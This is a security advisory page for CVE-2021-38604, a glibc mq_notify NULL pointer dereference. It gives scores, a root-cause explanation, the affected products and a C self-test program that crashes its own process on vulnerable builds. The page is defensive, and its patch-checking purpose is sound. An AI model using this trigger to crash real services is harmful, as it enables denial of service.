CVE-2021-38604

Severity: High · Public PoC referenced

Published: 12 August 2021
Modified: 30 May 2025
KEV Added: not listed
Patch: not recorded
CVSS v3.1: 7.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)
EPSS: 0.0010 (27.5th percentile)
Risk Priority: 15 (weighted 60% EPSS, 20% KEV, 20% CVSS)

Summary

CVE-2021-38604 is a high-severity NULL pointer dereference (CWE-476) in librt in the GNU C Library (glibc) through 2.34. Oracle also lists Enterprise Operations Monitor and several Oracle Communications cloud native core products as affected. The CVSS v3.1 base score is 7.5 (High): the vector is network-reachable with no privileges or user interaction required, and the only impact is availability (a crash of the affected process).

Operationally: EPSS places it at the 27.5th percentile of exploit likelihood (below the median); it is not listed in the CISA KEV catalog; a public proof of concept is referenced.

Vulnerability details

In librt in the GNU C Library (aka glibc) through 2.34, sysdeps/unix/sysv/linux/mq_notify.c mishandles certain NOTIFY_REMOVED data, leading to a NULL pointer dereference. NOTE: this vulnerability was introduced as a side effect of the CVE-2021-33574 fix. NOTIFY_REMOVED is the cookie the kernel sends to glibc's mq_notify helper thread when a SIGEV_THREAD notification registration is removed; after the CVE-2021-33574 fix the helper thread destroys and frees a copy of the caller's thread attributes on that path, and when the registration was made with sigev_notify_attributes set to NULL that copy is a NULL pointer. The upstream fix adds a NULL check before the destroy and free. Because the trigger is the registering process's own call sequence rather than attacker-supplied data, the realistic impact is a crash of a service that uses mq_notify this way, not a new remote attack surface.
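The condition described above can be driven through the public mq_notify API. The C program below is an added example written for this page; it is not the referenced public PoC and not glibc's own code or test suite. It assumes Linux with POSIX message queues available to the process, and the queue name it creates is a constructed one. It registers a SIGEV_THREAD notification with sigev_notify_attributes left NULL and then removes the registration, which makes the kernel deliver NOTIFY_REMOVED to glibc's helper thread. On a fixed glibc the helper thread skips the NULL attribute copy and the process survives; on an affected build the helper thread dereferences NULL and the whole process dies with SIGSEGV, which is the availability impact behind the CVSS vector.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <mqueue.h>
#include <signal.h>
#include <stdio.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Notification callback; never reached because no message is ever sent. */
static void on_message(union sigval sv)
{
    (void)sv;
}

/* Returns 0 if the register/remove round trip completed and the process is
   still alive, 1 if POSIX message queues are unavailable in this environment
   (nothing could be exercised), -1 on any other setup error (errno set).
   On an affected glibc the second mq_notify() call makes the kernel send a
   NOTIFY_REMOVED cookie to glibc's helper thread, which then destroys a NULL
   attribute copy and the process dies with SIGSEGV before this returns. */
int mq_notify_removed_roundtrip(void)
{
    /* Constructed queue name (example assumption), unique per process. */
    char name[64];
    snprintf(name, sizeof name, "/cve-2021-38604-%ld", (long)getpid());

    struct mq_attr qattr = { .mq_maxmsg = 1, .mq_msgsize = 1 };
    mqd_t mqd = mq_open(name, O_RDWR | O_CREAT | O_EXCL, 0600, &qattr);
    if (mqd == (mqd_t)-1)
        return (errno == ENOSYS || errno == EPERM || errno == EACCES) ? 1 : -1;
    mq_unlink(name);            /* the descriptor stays valid after unlinking */

    struct sigevent sev;
    memset(&sev, 0, sizeof sev);
    sev.sigev_notify = SIGEV_THREAD;
    sev.sigev_notify_function = on_message;
    sev.sigev_notify_attributes = NULL;   /* the trigger: nothing for glibc to copy */

    int rc = 0;
    if (mq_notify(mqd, &sev) != 0)        /* register: starts glibc's helper thread */
        rc = -1;
    else if (mq_notify(mqd, NULL) != 0)   /* remove: kernel sends NOTIFY_REMOVED */
        rc = -1;

    /* On a vulnerable build the crash is asynchronous, inside the helper
       thread; give it a moment before declaring survival. */
    usleep(200000);
    mq_close(mqd);
    return rc;
}

int main(void)
{
    int r = mq_notify_removed_roundtrip();
    if (r == 0)
        puts("survived NOTIFY_REMOVED round trip: this glibc checks the NULL attribute copy");
    else if (r == 1)
        puts("POSIX message queues unavailable here; nothing exercised");
    else
        perror("setup failed");
    return r < 0 ? 1 : 0;
}
```

Build with a plain C compiler (add -lrt on glibc older than 2.34, where librt is still a separate library) and run it on the host or container image under review: a clean exit means the installed glibc handles this path, while a SIGSEGV means the build is affected regardless of what the reported version string says, which matters because distributions backport the fix without changing the major version.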

CWE(s)

CWE-476: NULL Pointer Dereference

Related Threats

No named actor attribution yet. ATT&CK technique mapping in progress for this CVE.

Affected Assets

gnu glibc: ≤ 2.34
fedoraproject fedora: 35
oracle communications cloud native core binding support function: 22.1.3
oracle communications cloud native core network function cloud native environment: 22.1.0
oracle communications cloud native core network repository function: 22.1.2, 22.2.0
oracle communications cloud native core security edge protection proxy: 22.1.1
oracle communications cloud native core unified data repository: 22.2.0
oracle enterprise operations monitor: 4.3, 4.4, 5.0

Mitigating Controls

No mitigating controls mapped yet. Remediation is a glibc build that contains the fix; the Affected Assets list above gives the vulnerable glibc range (through 2.34) and the Fedora and Oracle products recorded as affected, so check the vendor's patched builds rather than the upstream version number alone.